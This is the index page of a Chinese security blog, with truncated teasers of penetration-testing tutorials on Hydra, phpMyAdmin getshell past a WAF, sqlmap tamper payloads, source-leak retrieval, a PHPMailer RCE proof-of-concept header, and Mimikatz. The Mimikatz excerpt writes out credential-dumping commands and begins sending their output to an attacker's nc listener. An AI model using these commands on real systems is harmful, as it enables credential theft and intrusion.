Linux下暴力破解工具Hydra详解

分类:安全 | 2017-03-16 | 撸过 2,004 次
0人扯谈

Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast.

Hydra was tested to compile on Linux, Windows/Cy[......]

继续阅读

phpmyadmin新姿势getshell

分类:安全 | 2017-03-15 | 撸过 3,826 次
6人扯谈

旁白:在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell?
首先环境如下:

  • OS:Windows 2003
  • WAF:Safe Dog 4.0正式版
  • phpmyadmin:4.7(许多都可以)
  • Mysql:5.5+
  • PHP:5.3
  • Apache:2.x

目前

into outfile

已经被禁用,并且WAF也会在写入文件的时候拦截。
那么我们尝试通过一个脑洞大开的方法去getshell。

(必须是mysql root权限)

登录phpmyadmin后,查看全局变量:
找到

general[......]

继续阅读

使用sqlmap中tamper脚本绕过waf

分类:安全 | 2017-03-9 | 撸过 1,819 次
0人扯谈

0x00 背景

sqlmap中的tamper脚本来对目标进行更高效的攻击。

由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在找相关的案例作为可分析什么环境使用什么tamper脚本。 小学生毕业的我,着能偷偷说一下多做一些收集对吸收知识很快。

0x01 start

脚本名:apostrophemask.py

作用:用utf8代替引号

Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested[......]

继续阅读

常见Web源码泄露总结

分类:安全 | 2017-02-13 | 撸过 1,954 次
0人扯谈

背景

本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现。

 

.hg源码泄漏

漏洞成因:

hg init的时候会生成.hg

e.g.http://www.example.com/.hg/

漏洞利用:

工具: dvcs-ripper

rip-hg.pl -v -u http://www.example.com/.hg/

.git源码泄漏

漏洞成因:

在运行git init初始化代码库的时候,会在当前目录下面产生一个.git的隐藏文件,用来记录代码的变更记录等等。在发布代码的时候,把.git这个目录没有删除,直接发布了[......]

继续阅读

PentestBox简明使用教程

分类:安全 | 2017-02-4 | 撸过 2,145 次
0人扯谈

0x01介绍

PentestBox:渗透测试盒子 顾名思义,这是一个渗透工具包,但是不同于绝大多数国内xx工具包的是,这里集成的大都是Linux下的工具,Kali Linux上面的常用的很多工具这里面也都集成了。

PentestBox官网:https://pentestbox.org/zh/

官方的介绍如下:

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境

为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。

它打包了所有的安全工具,并且可以在Windows系统中原生地[......]

继续阅读

PHPMailer < 5.2.18 - Remote Code Execution (PHP)

分类:安全 | 2017-01-13 | 撸过 1,031 次
0人扯谈

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on[......]

继续阅读

扫目录过狗过waf方法

分类:安全 | 2016-12-8 | 撸过 2,157 次
1人扯谈

用御剑的朋友都遇到过这个页面吧,装狗了开启保护就会这样

本机搭建安全狗设置发现,默认是过蜘蛛的,所以只要把http头来路改成蜘蛛的useragent就ok了

无奈御剑和wscan 都是无法设置http头的,也无法用burp做代理中转改http头

像AWVS,Burp类大型扫描工具也可以进行目录扫描,并且也可以挂代理,改http头,不过个人感觉远没有专业扫描工具来的简单

因此翻出一款老工具

DirBuster是Owasp(开放Web软体安全项目- Open Web Application Security Project )开发的一款专门用于探测Web服务器[......]

继续阅读

PentestBox 一款Windows平台开源渗透测试

分类:安全 | 2016-12-6 | 撸过 1,326 次
0人扯谈

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。

[ 源代码]

特性

易于使用

只是一个简单的命令行工具。group设计简洁

不同于传统的绿字黑色背景终端。flash_on性能卓越

直接运行在主机上而不依赖于虚拟机[......]

继续阅读

星外虚拟主机跨web目录文件读取技巧

分类:安全 | 2016-11-7 | 撸过 1,583 次
0人扯谈

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
 
c:\windows\7i24IISLOG2.exe
 
c:\windows\7i24IISLOG3.exe
 
c:\windows\7i24IISLOG4.exe
 
c:\windows\7i24tool.exe
 
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一[......]

继续阅读

Mimikatz 使用小技巧

分类:安全 | 2016-10-6 | 撸过 2,633 次
0人扯谈

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mi[......]

继续阅读

第 1 页,共 47 页12345...102030...最旧 »